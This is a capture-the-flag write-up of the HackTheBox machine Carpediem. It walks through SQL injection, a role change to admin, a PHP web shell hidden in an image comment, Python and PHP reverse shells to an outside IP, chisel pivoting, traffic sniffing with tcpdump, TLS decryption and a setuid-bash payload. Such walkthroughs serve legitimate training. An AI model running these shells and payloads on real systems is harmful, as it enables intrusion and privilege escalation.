Dec 3, 2022

11 min read

HackTheBox — Carpediem

Carpediem, a hard linux machine that involved registering for account and escalating to admin user by changing the login_type value, on registering a file can be uploaded which doesn’t allow php extensions which can be bypassed with ex iftool by adding a php code in the comment giving us www-data on the container, from there having access to mongodb we can port forward and access database revealing information to connect to zoiper using the credentials, on listening the voice mail for hflaccus we can get the credentials and login, having the capability cap_net_raw+ep set on tcpdump , sniffing the traffic which will show a POST request to login on backdrop cms, giving us the credentials which had an exploit for RCE giving us a shell on another container from which we can breakout using CVE-2022-0492 to become root on the host.

NMAP

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Comming Soon
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80 (HTTP)

Web server shows a single page showing a domain name carpediem.htb, so let's add this to hosts file

Running a diresearch to fuzz for files and directories

It didn’t showed any interesting files so moving to fuzz for subdomain wfuzz

wfuzz -c -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://carpediem.htb' -H "Host: FUZZ.carpediem.htb" --hh 2875

Fuzzing for files on this subdomain

python3 /opt/dirsearch/dirsearch.py -u 'http://portal.carpediem.htb/' -w /opt/SecLists/Discovery/Web-Content/common.txt

On visiting any page we can see a GET parameter s having a hash value of something

Play around for SQLi it does show that it’s vulnerable

Now dumping the tables

Database didn’t had anything special other than admin hash which I wasn’t able to crack

There was /admin which was found by fuzzing with dirsearch, I tried sqli on login page as well but it doesn't seem that there was sqli there

Although we can create an account so let’s where will it take us

We can update account details

On intercepting the request we can see a POST parameter login_type having value set to 2

I changed it to 1

This page was also vulnerable to sqli

But now we can access admin panel by changing the login type to 1 which is the admin role

Visiting the user profile we can upload an image file as user avatar

Uploading a regular jpeg file it will load the image

On uploading php file having system command it won’t allow uploading php files and will keep the previous uploaded image

Foothold

I tried changing the extension name to .php.jpeg and .jpeg.php but neither of them worked, so I used exiftool to add the php code in the comment of the image and changed the image extension to php

exiftool -Comment='<?php system($_GET['cmd']); ?>' ./image.jpeg

On uploading this php file we’ll see that it got uploaded, we can execute this php by checking the source code for the image file name and directory from where it’s being loaded

Using the python3 one liner reverse shell

python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.24",2222));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

We can now stabilize the shell with python3

From classes folder we can find the mysql credentials which maybe useful later

Transferring the nmap static binary we can scan for other docker containers if there are any

To access the services running on these containers we can start a socks proxy server to pivot into these services using chisel

On attacker machine

chisel server -p 8000 --reverse

On target machine

chisel client 10.10.14.32:8000 R:127.0.0.1:socks

Make sure to include this line in in /etc/proxychains.conf

socks5          127.0.0.1 1080

After setting this we can access the service running on other containers with proxychains

But we already had dumped the database through sqli, so next we can look at the ftp service which was running on 172.17.0.2, we can check if anonymous user is allowed to login

On listing files it shows an error

To avoid this we can change the mode to passive mode which uses an unprivileged port (port > 1024) to be opened on the server

But still it doesn’t show anything, moving onto 172.17.0.4 on which port 27017 is running which is used for mongodb

All the databases were empty other than trudesk

We can get some credentials from accounts table with db.accounts.find()

Privilege Escalation (hflaccus)

From tickets table we can read some messages which talks about Security risks of portal to disable admin section portal, changing a username, setting credentials for a new employee , building a cms which is hosted in a container and lastly to fix trudesk api permissions

On googling trudesk, it’s an opensource ticketing solution, checking the trudesk api installation page we can see that by default it listens on port 8118, To access this port on browser we can configure firefox with foxyproxy to use socks

But we don’t have the credentials for login, we saw from the tickets table that a Zoiper VoIP is being set for the new employee Horace Flaccus

Checking the port used by Zoiper

In order to interact with this we need to download the client, After installing it we’ll be presented with a login screen

We can login with 9650 as the username and 2022 as the password

Now we need to dial *62 to listen to our voicemail

After dialing the number, it’s going to ask us to enter the password which is again 2022 after that, hit 1 to listen for the message which will tell the password for horace flaccusAuRj4pxq9qPk

Since hflaccus wasn’t in the database for trudesk, I tried logging with ssh

Checking sudo -l to see if we can run anything as other user or as root

Next checking for any capabilities it found that capability are set on tcpdump

Having the capability cap_net_raw+ep set on tcdump which normally requires root privileges to work but with this capability we can capture traffic on docker0 interface and save it into a pcap file

tcpdump -i docker0 -w uwu.pcap

We can transfer this file by running python server on traget machine

Opening this file with wireshark we can see https traffic to backdrop.carpediem

This shows all the traffic is encrypted, if we remember there was https running on container 172.17.0.2

But here we need creds so we do need to find the credentials and for that we need to somehow to decrypt the https traffic, we can look for a .key file with find

We can add the key by going into preferences -> protocols -> TLS

And now we can see the http traffic

Getting the credentials we can login on backdrop cms

We can get remote code execution by installing a malicious module, either creating one by analyzing how the module is structured or just grabbing one from github

Start a netcat listener with proxychains, as python and python3 both weren’t available we can utilize php to get a reverse shell

php -r '$sock=fsockopen("10.10.14.24",2222);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'

We can stabilize the shell with script instead of python with

script /dev/null -c bash

From the running processes we can see heartbeat.sh being executed as root

In the script, backdrop.sh which is being used for making a request to backdrop through command line to the url which will execute index.php , so we need to replace that file with our php command

<?php system ('chmod +s /bin/bash') ?>

Just replace the index.php file with this

Privilege Escalation (root)

We got root on the container, to get root on the actual host we need to break out of the container, I edited the shadow file to add a password for root user so I could get an even more better shell

For breaking out of the container a recent docker escape vulnerability was found related to cgroups CVE-2022-0492, There’s a test script for this cve if we can breakout of container